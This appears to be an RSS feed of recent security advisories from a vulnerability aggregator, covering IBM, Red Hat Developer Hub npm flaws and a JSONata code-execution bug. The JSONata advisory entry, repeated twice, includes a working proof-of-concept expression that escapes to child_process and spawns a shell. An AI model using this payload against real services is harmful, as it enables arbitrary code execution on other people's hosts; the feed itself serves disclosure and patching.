<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 06:30:47 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-12626</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-12626</link>
      <description>bdu:2026-12626</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-12626</guid>
    </item>
    <item>
      <title>certfr-2026-avi-1165 — De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquan…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2026-avi-1165</link>
      <description>certfr-2026-avi-1165</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2026-avi-1165</guid>
    </item>
    <item>
      <title>EUVD-2026-358323</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-358323</link>
      <description>EUVD-2026-358323</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-358323</guid>
    </item>
    <item>
      <title>fkie_cve-2026-77413</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-77413</link>
      <description>&lt;p&gt;JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-77413</guid>
    </item>
    <item>
      <title>GHSA-8gq3-vp5j-2grp — JSONata: Arbitrary Code Execution via crafted JSONata expressions</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-8gq3-vp5j-2grp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: jsonata&lt;/p&gt;
&lt;p&gt;## Impact&lt;/p&gt;
&lt;p&gt;Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function:
https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705&lt;/p&gt;
&lt;p&gt;This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release.&lt;/p&gt;
&lt;p&gt;## PoC&lt;/p&gt;
&lt;p&gt;```js
import jsonata from &amp;#34;jsonata&amp;#34;;&lt;/p&gt;
&lt;p&gt;const expression = jsonata(`
(
   __lookupSetter__(&amp;#39;__proto__&amp;#39;)(constructor);
   __defineGetter__(&amp;#39;l&amp;#39;, constructor(&amp;#34;return
process.getBuiltinModule(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;sh&amp;#39;,{stdio:&amp;#39;inherit&amp;#39;}).toString()&amp;#34;));
   valueOf().l
)
`);&lt;/p&gt;
&lt;p&gt;await expression.evaluate({});
```&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: jsonata&lt;/p&gt;
&lt;p&gt;## Impact&lt;/p&gt;
&lt;p&gt;Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function:
https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705&lt;/p&gt;
&lt;p&gt;This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release.&lt;/p&gt;
&lt;p&gt;## PoC&lt;/p&gt;
&lt;p&gt;```js
import jsonata from &amp;#34;jsonata&amp;#34;;&lt;/p&gt;
&lt;p&gt;const expression = jsonata(`
(
   __lookupSetter__(&amp;#39;__proto__&amp;#39;)(constructor);
   __defineGetter__(&amp;#39;l&amp;#39;, constructor(&amp;#34;return
process.getBuiltinModule(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;sh&amp;#39;,{stdio:&amp;#39;inherit&amp;#39;}).toString()&amp;#34;));
   valueOf().l
)
`);&lt;/p&gt;
&lt;p&gt;await expression.evaluate({});
```&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-8gq3-vp5j-2grp</guid>
    </item>
    <item>
      <title>RHSA-2026:76788 — Red Hat Security Advisory: Red Hat Developer Hub 1.10.5 Plugin Catalog GA plugins release.</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2026:76788</link>
      <description>&lt;p&gt;undici: undici: Denial of Service via unrequested WebSocket subprotocol vm2: vm2: Denial of Service due to memory allocation limit bypass vm2: vm2: Missing Error.cause Sanitization Enables VM2 Sandbox Escape to RCE vm2: vm2: Sandbox Breakout Using Dangerous Host Proto Mutators urllib: urllib: Credential leakage via cross-origin redirects fast-uri: fast-uri: Server-Side Request Forgery via repeated hostname percent-decoding fast-uri: fast-uri: Host confusion via skipped IDN canonicalization fast-uri: fast-uri: Server-side request forgery via malformed IPv6 normalization fast-uri: fast-uri: URI parsing flaw enables server-side request forgery and redirects multer: Multer: Denial of Service via file descriptor leak on aborted uploads multer: Multer: Denial of Service via crafted multipart field names jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions multer: Multer: Denial of Service via oversized array index in field names qs: qs: Denial of Service via improper validation in stringify function fast-uri: fast-uri: Authority Injection via Unvalidated Port Serialization js-yaml: js-yaml: Denial of Service vulnerability in YAML parsing fast-uri: fast-uri: Host confusion via unbalanced URI brackets can bypass security policies undici: undici: TLS certificate validation bypass in BalancedPool via dropped connect…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;undici: undici: Denial of Service via unrequested WebSocket subprotocol vm2: vm2: Denial of Service due to memory allocation limit bypass vm2: vm2: Missing Error.cause Sanitization Enables VM2 Sandbox Escape to RCE vm2: vm2: Sandbox Breakout Using Dangerous Host Proto Mutators urllib: urllib: Credential leakage via cross-origin redirects fast-uri: fast-uri: Server-Side Request Forgery via repeated hostname percent-decoding fast-uri: fast-uri: Host confusion via skipped IDN canonicalization fast-uri: fast-uri: Server-side request forgery via malformed IPv6 normalization fast-uri: fast-uri: URI parsing flaw enables server-side request forgery and redirects multer: Multer: Denial of Service via file descriptor leak on aborted uploads multer: Multer: Denial of Service via crafted multipart field names jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions multer: Multer: Denial of Service via oversized array index in field names qs: qs: Denial of Service via improper validation in stringify function fast-uri: fast-uri: Authority Injection via Unvalidated Port Serialization js-yaml: js-yaml: Denial of Service vulnerability in YAML parsing fast-uri: fast-uri: Host confusion via unbalanced URI brackets can bypass security policies undici: undici: TLS certificate validation bypass in BalancedPool via dropped connect…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2026:76788</guid>
    </item>
  </channel>
</rss>
